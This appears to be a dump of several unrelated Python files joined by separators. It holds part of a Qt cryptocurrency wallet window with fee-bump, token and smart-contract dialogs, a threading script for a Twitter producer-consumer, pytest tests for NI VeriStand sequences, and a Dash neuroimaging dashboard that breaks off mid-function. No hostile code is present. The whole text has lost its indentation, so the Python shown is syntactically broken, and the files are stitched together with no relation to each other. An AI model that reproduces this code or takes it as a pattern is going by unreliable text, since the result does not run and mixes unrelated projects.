if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0, 1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
def create_tokens_tab(self):
from .token_list import TokenBalanceList, TokenHistoryList
self.token_balance_list = tbl = TokenBalanceList(self)
self.token_hist_list = thl = TokenHistoryList(self)
splitter = QSplitter(self)
splitter.addWidget(tbl)
splitter.addWidget(thl)
splitter.setOrientation(Qt.Vertical)
return splitter
def set_token(self, token):
"""
:type token: Token
:return:
"""
self.wallet.add_token(token)
self.token_balance_list.update()
self.token_hist_list.update()
def delete_token(self, key):
if not self.question(_("Remove {} from your list of tokens?".format(
self.tokens[key].name))):
return False
self.tokens.pop(key)
self.token_balance_list.update()
self.token_hist_list.update()
def token_add_dialog(self):
d = TokenAddDialog(self)
d.show()
def token_view_dialog(self, token):
"""
:type token: Token
"""
d = TokenInfoDialog(self, token)
d.show()
def token_send_dialog(self, token):
"""
:type token: Token
"""
d = TokenSendDialog(self, token)
d.show()
def do_token_pay(self, token, pay_to, amount, gas_limit, gas_price, dialog):
try:
datahex = 'a9059cbb{}{:064x}'.format(pay_to.zfill(64), amount)
script = contract_script(gas_limit, gas_price, datahex, token.contract_addr, opcodes.OP_CALL)
outputs = [(TYPE_SCRIPT, script, 0), ]
tx_desc = 'pay out {} {}'.format(amount / (10 ** token.decimals), token.symbol)
self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, token.bind_addr, dialog)
except (BaseException,) as e:
traceback.print_exc(file=sys.stderr)
dialog.show_message(str(e))
def _smart_contract_broadcast(self, outputs, desc, gas_fee, sender, dialog):
coins = self.get_coins()
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, None,
change_addr=sender,
gas_fee=gas_fee,
sender=sender)
except NotEnoughFunds:
dialog.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
dialog.show_message(str(e))
return
amount = sum(map(lambda y: y[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
dialog.show_message(
_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
# confirmation dialog
msg = [
_(desc),
_("Mining fee") + ": " + self.format_amount_and_units(fee - gas_fee),
_("Gas fee") + ": " + self.format_amount_and_units(gas_fee),
]
confirm_rate = 2 * self.config.max_fee_rate()
if fee - gas_fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, desc)
self.sign_tx_with_password(tx, sign_done, password)
def set_smart_contract(self, name, address, interface):
"""
:type name: str
:type address: str
:type interface: list
:type _type: str
:return: bool
"""
if not is_hash160(address):
self.show_error(_('Invalid Address'))
self.smart_contract_list.update()
return False
self.smart_contracts[address] = (name, interface)
self.smart_contract_list.update()
return True
def delete_samart_contact(self, address):
if not self.question(_("Remove {} from your list of smart contracts?".format(
self.smart_contracts[address][0]))):
return False
self.smart_contracts.pop(address)
self.smart_contract_list.update()
return True
def call_smart_contract(self, address, abi, args, sender, dialog):
data = eth_abi_encode(abi, args)
try:
result = self.network.synchronous_get(('blockchain.contract.call', [address, data, sender]), timeout=10)
except BaseException as e:
dialog.show_message(str(e))
return
types = list([x['type'] for x in abi.get('outputs', [])])
try:
result = eth_abi.decode_abi(types, binascii.a2b_hex(result))
def decode_x(x):
if isinstance(x, bytes):
try:
return x.decode()
except UnicodeDecodeError:
return str(x)
return str(x)
result = ','.join([decode_x(x) for x in result])
except (BaseException,) as e:
print(e)
pass
if not result:
dialog.show_message('')
return
dialog.show_message(result)
def sendto_smart_contract(self, address, abi, args, gas_limit, gas_price, amount, sender, dialog):
try:
abi_encoded = eth_abi_encode(abi, args)
script = contract_script(gas_limit, gas_price, abi_encoded, address, opcodes.OP_CALL)
outputs = [(TYPE_SCRIPT, script, amount), ]
tx_desc = 'contract sendto {}'.format(self.smart_contracts[address][0])
self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, sender, dialog)
except (BaseException,) as e:
dialog.show_message(str(e))
def create_smart_contract(self, bytecode, constructor, args, gas_limit, gas_price, sender, dialog):
try:
abi_encoded = ''
if constructor:
abi_encoded = eth_abi_encode(constructor, args)
script = contract_script(gas_limit, gas_price, bytecode + abi_encoded, opcodes.OP_CREATE)
outputs = [(TYPE_SCRIPT, script, 0), ]
self._smart_contract_broadcast(outputs, 'contract create', gas_limit * gas_price, sender, dialog)
except (BaseException,) as e:
dialog.show_message(str(e))
def contract_create_dialog(self):
d = ContractCreateDialog(self)
d.show()
def contract_add_dialog(self):
d = ContractEditDialog(self)
d.show()
def contract_edit_dialog(self, address):
name, interface = self.smart_contracts[address]
contract = {
'name': name,
'interface': interface,
'address': address
}
d = ContractEditDialog(self, contract)
d.show()
def contract_func_dialog(self, address):
name, interface = self.smart_contracts[address]
contract = {
'name': name,
'interface': interface,
'address': address
}
d = ContractFuncDialog(self, contract)
d.show()
|
test_multi_thread_producer_consumer_sql_twitter.py
|
#!/usr/bin/env python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "../"))
from multi_thread_producer_consumer_sql_twitter import ProducerConsumerThreadSqlTwitter
from os import path
import threading
APP_ROOT = path.dirname(path.abspath( __file__ ))
"""
This script for parallel command multi thread program
"""
if __name__ == '__main__':
"""
"""
producerConsumerThreadSqlTwitter = ProducerConsumerThreadSqlTwitter()
multi_thread_producer_twitter_instance = threading.Thread(target=producerConsumerThreadSqlTwitter.producer_run)
multi_thread_consumer_twitter_instance = threading.Thread(target=producerConsumerThreadSqlTwitter.consumer_run)
multi_thread_producer_twitter_instance.start()
multi_thread_consumer_twitter_instance.start()
|
test_runpyasrtseq.py
|
import sys
import threading
from niveristand import nivs_rt_sequence
from niveristand import realtimesequencetools
from niveristand.clientapi import DoubleValue, ErrorAction, RealTimeSequence
from niveristand.errors import RunAbortedError, RunFailedError, TranslateError
from niveristand.library import generate_error
from niveristand.library._tasks import get_scheduler
import pytest
from testutilities import validation
@nivs_rt_sequence
def return_var():
a = DoubleValue(5)
return a.value
@nivs_rt_sequence
def _increment(a):
a.value += 1
return a.value
@nivs_rt_sequence
def sub_routine_caller():
a = DoubleValue(5)
_increment(a)
return a.value
@nivs_rt_sequence
def invalid_sequence():
a = DoubleValue(5)
a += 1
return a
@nivs_rt_sequence
def return_void():
a = DoubleValue(5) # noqa: F841 it's ok for this variable to never be used
@nivs_rt_sequence
def generate_error_continue():
generate_error(1, "Continue", ErrorAction.ContinueSequenceExecution)
@nivs_rt_sequence
def generate_error_stop():
generate_error(2, "Stop", ErrorAction.StopSequence)
@nivs_rt_sequence
def generate_error_abort():
generate_error(3, "Abort", ErrorAction.AbortSequence)
run_tests = [
(return_var, (), 5),
(sub_routine_caller, (), 6),
(return_void, (), None),
]
fail_transform_tests = [
(invalid_sequence, (), TranslateError),
(generate_error_continue, (), RunFailedError),
(generate_error_stop, (), RunAbortedError),
(generate_error_abort, (), RunAbortedError),
]
def idfunc(val):
try:
return val.__name__
except AttributeError:
return str(val)
@pytest.mark.parametrize("func_name, params, expected_result", run_tests, ids=idfunc)
def test_run_py_as_rts(func_name, params, expected_result):
actual = realtimesequencetools.run_py_as_rtseq(func_name)
assert actual == expected_result
def test_not_wait_to_complete():
seq = RealTimeSequence(return_var)
result_state = seq.run()
assert result_state.ret_val is None
result_state.wait_for_result()
assert result_state.ret_val == 5
def test_run_multiple_top_level_seqs():
assert len(get_scheduler()._task_dict) == 0
for func, params, expected in run_tests:
actual = realtimesequencetools.run_py_as_rtseq(func)
assert actual == expected
# check that the scheduler is empty after every run.
assert len(get_scheduler()._task_dict) == 0
def test_run_multiple_top_level_seqs_in_parallel():
threads = list()
thread_results = dict()
for func, params, expected in run_tests:
thread_results[func] = expected
def run_func_helper(func):
actual = realtimesequencetools.run_py_as_rtseq(func)
thread_results[func] = (thread_results[func], actual)
thread = threading.Thread(target=run_func_helper, name=func.__name__, args=(func,))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for func, results in thread_results.items():
assert results[0] == results[1], "Func: %s failed assert" % func.__name__
@pytest.mark.parametrize("func_name, params, expected_result", fail_transform_tests, ids=idfunc)
def test_failures(func_name, params, expected_result):
with pytest.raises(expected_result):
realtimesequencetools.run_py_as_rtseq(func_name)
def test_check_all_tested():
validation.test_validate(sys.modules[__name__])
|
dashboard.py
|
import io
import base64
import threading
import traceback
import numpy as np
import scipy.io as sio
import pandas as pd
import dash
from dash_table import DataTable
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.exceptions import PreventUpdate
from dash.dependencies import (Input, Output, State)
from PyQt5.QtCore import *
from PyQt5.QtWebEngineWidgets import *
from PyQt5 import QtWebEngineWidgets, QtCore, QtWidgets
from nidmd import Decomposition, Brain, Spectre, TimePlot, Radar
from utils import *
class Dashboard(QWebEngineView):
"""
The Dashboard is where the Dash web-app lives.
"""
def __init__(self):
""" Constructor. """
# Call to superclass
super().__init__()
# Display full screen
self.showMaximized()
# Handle download requests for Plotly image saving
QtWebEngineWidgets.QWebEngineProfile.defaultProfile().downloadRequested.connect(
self.on_download_requested
)
# Define local host address
host = dict(address='127.0.0.1', port=8000)
# Initialize decompositions
self.dcp1 = None
self.dcp2 = None
self.match_group = None
self.match_df = None
self.match_x = None
self.match_y = None
self.atlas = None
# Used for cortical surface representation loading
self.progress = 0
# Input data valid and visualization can be launched
self.valid = False
# Display imaginary values in visualization
self.imag = False
# Fetch and add Dash Bootstrap Component theme
self.app = dash.Dash(
external_stylesheets=[dbc.themes.COSMO]
)
# Initialize log file
self.logfile = open(CACHE_DIR.joinpath('log.log').as_posix(), 'r')
# Fetch app layout
self.app.layout = self._get_app_layout()
# Use threading to launch Dash App
threading.Thread(target=self.run_dash, daemon=True).start()
self.load(QUrl("http://{0}:{1}".format(host['address'], host['port'])))
@QtCore.pyqtSlot("QWebEngineDownloadItem*")
def on_download_requested(self, download):
# Determine file type
mime_type = download.mimeType()
if mime_type == 'image/svg+xml':
filename = 'nidmd-visualization'
suffix = 'svg'
elif mime_type == 'application/octet-stream':
filename = 'nidmd-data'
suffix = 'csv'
else:
filename = 'some-error'
suffix = ''
path, _ = QtWidgets.QFileDialog.getSaveFileName(
self, "Save File", '.'.join([filename, suffix]), '.'.join(['*', suffix])
)
if path:
download.setPath(path)
download.accept()
def run_dash(self, address='127.0.0.1', port=8000):
"""
Run Dash.
:param address: [str] address
:param port: [int] port
"""
@self.app.callback(
Output('log', 'children'),
[Input('log-update', 'n_intervals')],
[State('log', 'children')]
)
def update_logs(interval, console):
if console is not None:
for line in self.logfile.read().split('\n'):
console.append(html.Tbody(line))
return console
else:
return None
@self.app.callback([
Output('upload-1-div', 'style'),
Output('upload-2-div', 'style'),
Output('selected-files-group-2-t', 'style'),
Output('selected-files-group-2-p', 'style'),
Output('selected-files-group-1-t', 'children'),
Output('selected-files-group-2-t', 'children'),
Output('upload-1', 'children'),
Output('upload-2', 'children'),
Output('approx-deg-div', 'style')
], [
Input('setting', 'value')
])
def input_setting(value):
""" Modify input setting. """
show = {}
hide = dict(display="none")
style = dict(height="60px", lineHeight="60px", borderWidth="1px", borderStyle="dashed", borderRadius="5px",
textAlign="center", margin="10px", padding="auto", width="90%")
if value is None:
return hide, hide, hide, hide, "Selected files", \
None, None, None, hide
elif value == 1: # Analysis
return style, hide, hide, hide, "Selected files", None, \
html.Div(['Drag and Drop or ', html.A('Select Files')]), None, hide
elif value == 2: # Comparison
return style, style, show, show, "Group 1", "Group 2", \
html.Div(['Group 1: Drag and Drop or ', html.A('Select Files')]), \
html.Div(['Group 2: Drag and Drop or ', html.A('Select Files')]), hide
elif value == 3: # Matching Modes
return style, style, show, show, "Reference Group", "Match Group", \
html.Div(['Reference Group: Drag and Drop or ', html.A('Select Files')]), \
html.Div(['Match Group: Drag and Drop or ', html.A('Select Files')]), show
@self.app.callback([
Output('table-1-tab', 'label'),
Output('table-2-tab', 'label')
], [
Input('setting', 'value')
])
def update_tab_labels(setting):
if setting is None:
raise PreventUpdate
elif setting == 1: # Analysis
return 'Modes', ''
elif setting == 2: # Comparison
return 'Group 1', 'Group 2'
elif setting == 3: # Mode Matching
return 'Reference', 'Match'
@self.app.callback(
Output('help-modal', 'is_open'),
[
Input('help-general', 'n_clicks')
],
[
State('help-modal', 'is_open')
]
)
def toggle_modal_general(n, is_open):
""" Toggle general help modal """
if n:
return not is_open
return is_open
@self.app.callback(
Output('help-modal-selection', 'is_open'),
[
Input('help-selection', 'n_clicks')
], [
State('help-modal-selection', 'is_open')
]
)
def toggle_modal_selection(n, is_open):
""" Toggle selection help modal """
if n:
return not is_open
return is_open
@self.app.callback([
Output('animated-progress-1', 'style'),
Output('animated-progress-2', 'style'),
], [
Input('upload-1', 'contents'),
Input('upload-2', 'contents')
], [
State('setting', 'value')
])
def progress_file(contents1, contents2, setting):
""" Progress bar for file upload. """
if setting is None:
raise PreventUpdate
else:
show = {}
hide = {'display': 'none'}
if setting == 1:
return show if self.dcp1 is None else hide, hide
elif setting == 2:
return show if self.dcp1 is None and contents1 is not None else hide, \
show if self.dcp2 is None and contents2 is not None else hide
elif setting == 3:
return show if self.dcp1 is None and contents1 is not None else hide, \
show if self.match_df is None and contents2 is not None else hide
else:
return hide, hide
@self.app.callback([
Output('selected-files-group-1-p', 'children'),
Output('selected-files-group-2-p', 'children'),
Output('table-1-tab', 'children'),
Output('table-2-tab', 'children'),
Output('table-2-tab', 'disabled'),
Output('animated-progress-1-div', 'style'),
Output('animated-progress-2-div', 'style'),
Output('import-alert', 'children'),
Output('import-alert', 'style'),
], [
Input('upload-1', 'contents'),
Input('upload-2', 'contents'),
Input('sampling-time', 'value')
], [
State('upload-1', 'filename'),
State('upload-2', 'filename'),
State('setting', 'value'),
State('approx-deg', 'value')
])
def upload(contents1, contents2, time, names1, names2, setting, approx_deg):
df1 = None
df2 = None
tab1 = None
tab2 = None
disabled = True
error = False
message = ""
table_config = dict(
fixed_rows=dict(headers=True, data=0),
style_cell=dict(padding="5px"),
style_header=dict(backgroundColor="white",
fontWeight="bold",
fontFamily="Helvetica",
padding="0px 5px"),
style_data=dict(fontFamily="Helvetica"),
style_data_conditional=[{'if': dict(row_index="odd"), # if is a keyword
**dict(backgroundColor="rgb(248, 248, 248)")}],
style_as_list_view=True,
style_table={'height': '90%', 'overflowY': 'auto'},
export_format="csv"
)
columns = [dict(name='#', id='mode'), dict(name='Value', id='value'),
dict(name='Damping Time', id='damping_time'), dict(name='Period', id='period')]
if [contents1, contents2, names1, names2].count(None) == 4:
raise PreventUpdate
else:
try:
if contents1 is not None:
logging.info("Adding contents to {}.".format("Group 1" if setting == 2 else "Reference Group"))
self.dcp1 = _parse_files(contents1, names1, float(time))
self.dcp1.run()
df1 = self.dcp1.df[['mode', 'value', 'damping_time', 'period']]
logging.info(
"Creating Data Table for {}.".format("Group 1" if setting == 2 else "Reference Group"))
tab1 = _create_table(df1, id="table-1", columns=columns, config=table_config)
if setting != 1:
if contents2 is not None and (self.dcp2 is None or self.match_group is None):
if setting == 2: # Comparison
logging.info("Adding contents to Group 2.")
self.dcp2 = _parse_files(contents2, names2, float(time))
self.dcp2.run()
df2 = self.dcp2.df[['mode', 'value', 'damping_time', 'period']]
tab2 = _create_table(df2, id="table-2", columns=columns, config=table_config)
disabled = False
if setting == 3: # Mode Matching
logging.info("Adding contents to Match Group.")
self.match_group = _parse_files(contents2, names2, float(time))
self.match_group.run()
if self.dcp1 is None:
raise ImportError("Please upload Reference group before Match group.")
else:
no_modes = int(approx_deg / 100.0 * self.match_group.atlas.size)
self.match_df, self.match_x, self.match_y = self.dcp1.compute_match(
self.match_group,
no_modes)
match_df = self.match_df.copy()
tab2 = _create_table(match_df, id="table-2", columns=columns, config=table_config)
disabled = False
except Exception as e:
logging.error(traceback.format_exc())
message = str(e)
error = True
deb = "Types = Group 1: {0}, Group 2: {1}, Match: {2}".format(type(self.dcp1), type(self.dcp2),
type(self.match_group))
logging.debug(deb)
hide = {'display': 'none'}
show = {}
def indent(lines):
if isinstance(lines, list):
return html.P(', \n'.join(lines))
else:
return html.P(lines)
return indent(names1), indent(names2), tab1, tab2, disabled, hide if contents1 is not None else show, \
hide if contents2 is not None else show, message, show if error else hide
@self.app.callback(
Output('imag-setting', 'options')
, [
Input('imag-setting', 'value')
])
def imag_switch(switch):
""" Switch between displaying and not displaying imaginary values. """
self.imag = switch == [1]
message = "Plotting imaginary values" if self.imag else "Not plotting imaginary values"
logging.info(message)
options = [{"label": message, "value": 1}]
return options
@self.app.callback([
Output('message-alert', 'children'),
Output('message-alert', 'style'),
Output('upload-row', 'style')
], [
Input('run', 'n_clicks')
], [
State('setting', 'value')
])
def validate(n, setting):
"""
Validate input
:param n: [int] onClick() "Run Decomposition" button
:param setting: [int] value of setting radio
:return message: [str] error message
:return style: [dict] show or hide error message
:return style: [dict] show or hide upload row
"""
message = ""
error = False
if n is None:
raise PreventUpdate
if setting is not None:
if setting == 1:
if self.dcp1 is None:
message += "No file(s) chosen. "
error = True
elif setting == 2:
if self.dcp1 is None or self.dcp2 is None:
message += "Group {} missing. ".format(2 if self.dcp2 is None else 1)
error = True
elif setting == 3:
if self.dcp1 is None:
message += "Reference group missing. "
error = True
if self.match_df is None:
message += "Match group is loading. Please wait. "
error = True
elif self.atlas is None:
message += "Parsing unsuccessful, no atlas found. "
error = True
else:
message += "No setting chosen. "
error = True
if error:
message += "Check log for more info."
else:
self.valid = True
hide = dict(display="none")
return message, {} if error else hide, {} if error else hide
@self.app.callback([
Output('app-layout', 'children')
], [
Input('reset', 'n_clicks')
])
def rst(n):
""" Reset Application. """
if n is None:
raise PreventUpdate
else:
self.dcp1 = None
self.dcp2 = None
self.match_group = None
self.match_df = None
self.match_x = None
self.match_y = None
self.atlas = None
self.progress = 0
self.valid = False
self.imag = False
return [self._get_app_layout()]
@self.app.callback(
Output('spectre', 'figure')
, [
Input('run', 'n_clicks')
]
)
def compute_spectre(n):
"""
Compute Spectre figure
:param n: [int] onClick() "Run Decomposition" button
:param nom: [int] number of modes
:return: [go.Figure] figure
"""
if n is None or not self.valid:
raise PreventUpdate
else:
if self.match_group is None:
logging.info("Computing spectre of dynamical modes")
s = Spectre(*_filter_spectre())
return s.figure()
else:
assert self.match_x is not None
assert self.match_y is not None
logging.info("Computing spectre of dynamical modes")
return Spectre.correlation(pd.DataFrame({'Approximated': self.match_x, 'Real': self.match_y}))
@self.app.callback(
Output('timeplot', 'figure')
, [
Input('run', 'n_clicks')
], [
State('number-of-modes', 'value')
])
def compute_timeplot(n, nom):
"""
Compute Timeplot figure
:param n: [int] onClick() "Run Decomposition" button
:param nom: [int] number of modes
:return: [go.Figure] figure
"""
if n is None or not self.valid:
raise PreventUpdate
else:
logging.info("Computing time series activation of dominant modes")
t = TimePlot(*_filter_time())
return t.figure(nom + 1)
@self.app.callback(
Output('radar', 'figure')
, [
Input('run', 'n_clicks')
], [
State('number-of-modes', 'value')
])
def compute_radar(n, nom):
"""
Compute Radar figure
:param n: [int] onClick() "Run Decomposition" button
:param nom: [int] number of modes
:return: [go.Figure] figure
"""
if n is None or not self.valid:
raise PreventUpdate
else:
logging.info("Computing cortical network activation")
r = Radar(*_filter_radar())
return r.figure(self.imag, nom + 1)
@self.app.callback([
Output('brains', 'children'),
Output('progress-div', 'style')
], [
Input('run', 'n_clicks')
], [
State('number-of-modes', 'value')
])
def compute_brain(n, nom):
"""
Compute brain figures
:param n: [int] onClick() "Run Decomposition" button
:param nom: [int] number of modes
:return brains: [list of html.Div] figures
:return style: [dict] hide progress Div
"""
if n is None or not self.valid:
raise PreventUpdate
else:
logging.info("Computing cortical surface representations")
brains = []
self.progress += 10.0
for mode in range(1, nom + 1):
b = Brain(*_filter_brain(mode))
brains.append(html.Div(children=[
dcc.Graph(figure=b.figure(self.imag), config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg",
filename="mode {}".format(mode))))
]))
self.progress += 90.0 / nom
return brains, dict(display="none")
@self.app.callback([
Output("progress", "value"),
Output("progress", "children")
], [
Input("progress-interval", "n_intervals")
])
def progress(n):
"""
Update progress bar
Inspired from - https://stackoverflow.com/questions/59241705/dash-progress-bar-for-reading-files
"""
# check progress of some background process, in this example we'll just
# use n_intervals constrained to be in 0-100
prog = min(self.progress % 110, 100)
# only add text after 5% progress to ensure text isn't squashed too much
return prog, "{} %".format(prog if prog >= 5 else "")
# UTILITY FUNCTIONS
# placed in run_dash because of daemon=True
def _parse_files(contents, files, sampling_time):
"""
Parse incoming .mat files.
:param contents: list of Base64 encoded contents
:param files: list of names
:param sampling_time: sampling time of data
:return decomposition: Decomposition instance
"""
logging.info("Parsing {0} file{1} with sampling time {2}".format(len(files),
's' if len(files) > 1 else '',
sampling_time))
data = []
for content, name in zip(contents, files):
d = None
if Path(name).suffix == '.mat':
_, string = content.split(',')
mat = io.BytesIO(base64.b64decode(string))
matfile = sio.loadmat(mat)
for key in matfile.keys():
if key[:2] != '__':
d = matfile[key]
logging.info("Extracted matrix from file {} from key {}".format(name, key))
continue
if d is None:
logging.error("Invalid .mat file, no matrices inside.")
raise ImportError("Invalid .mat file, no matrices inside.")
elif Path(name).suffix == '.csv':
_, content_string = content.split(',')
decoded = base64.b64decode(content_string)
d = np.genfromtxt(
io.StringIO(decoded.decode('utf-8')),
delimiter=","
)
if d is None:
logging.error("Problem reading the csv file.")
